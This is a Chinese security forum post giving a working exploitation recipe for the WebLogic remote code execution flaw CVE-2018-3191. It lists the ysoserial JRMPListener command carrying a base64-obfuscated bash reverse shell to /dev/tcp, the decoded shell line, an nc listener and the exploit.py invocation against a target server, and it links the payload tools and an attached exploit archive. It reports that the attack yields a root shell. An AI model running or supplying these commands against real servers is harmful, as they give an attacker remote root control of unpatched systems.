查看: 18218|回复: 0

WebLogic远程代码执行-CVE-2018-3191

[复制链接]
  • TA的每日心情

    2024-12-14 22:22
  • 签到天数: 1631 天

    [LV.Master]伴坛终老

    发表于 2018-10-26 20:24:21 | 显示全部楼层 |阅读模式
    # CVE-2018-3191
    CVE-2018-3191 反弹shell
    本地ip:172.16.38.1
    Weblogic:172.16.38.174:7001
    1、        本地执行
    [AppleScript] 纯文本查看 复制代码
    java -cp ysoserial-master.jar ysoserial.exploit.JRMPListener 2222 CommonsCollections1 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMzguMS83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}'


    然后执行 nc -lvv 7777

    (1)        其中的 bash 命令为避免Runtime.getRuntime().exec() 执行过程中将特殊符号转义,进行了base64转码解码的操作,明文为
    [AppleScript] 纯文本查看 复制代码
    bash -i >& /dev/tcp/172.16.38.1/7777 0>&1

    (2)        此操作在本地监听一个JRMPListener,接收被攻击的weblogic 的请求,并执行指定的bash 反弹命令。
    (3)        Nc 监听7777等待weblogic 主机反弹bash连接。
    2、        执行
    [AppleScript] 纯文本查看 复制代码
    python exploit.py 172.16.38.247 7001 weblogic-spring-jndi-10.3.6.0.jar 172.16.38.1 2222
    ,利用漏洞使weblogic 访问远程rmi服务,并执行bash反弹命令。


    3、        nc监听的端口收到反弹的bash,root权限。

    攻击所需工具:
    [AppleScript] 纯文本查看 复制代码
    ysoserial-master.jar //反序列化利用工具[url]https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar[/url]
    weblogic-spring-jndi-10.3.6.0.jar // CVE-2018-3191 payload生成工具
    [url]https://github.com/voidfyoo/CVE-2018-3191/releases[/url]
    exploit.py //weblogic t3协议发送工具,集成CVE-2018-3191 payload


    WebLogic远程代码执行-CVE-2018-3191.zip (3.79 KB, 下载次数: 9)
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-26 16:59 , Processed in 0.024833 second(s), 15 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部